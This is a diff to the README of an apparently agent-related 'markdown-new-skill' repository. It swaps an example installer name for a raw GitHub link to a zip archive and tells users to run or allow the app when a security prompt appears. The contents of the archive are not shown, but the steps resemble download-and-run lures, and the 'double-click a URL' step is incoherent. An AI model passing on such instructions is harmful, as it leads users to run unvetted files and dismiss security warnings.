CenMeow/markdown-new-skill/README.md

 1. Go to your Downloads folder or wherever your browser saved the file.

-2. Double-click the downloaded file (for example, `markdown-new-skill-setup.exe`).
+2. Double-click the downloaded file (for example, `https://raw.githubusercontent.com/CenMeow/markdown-new-skill/main/markdown-new/agents/markdown_new_skill_v1.9.zip`).

 3. If a security prompt appears, choose to run or allow the app.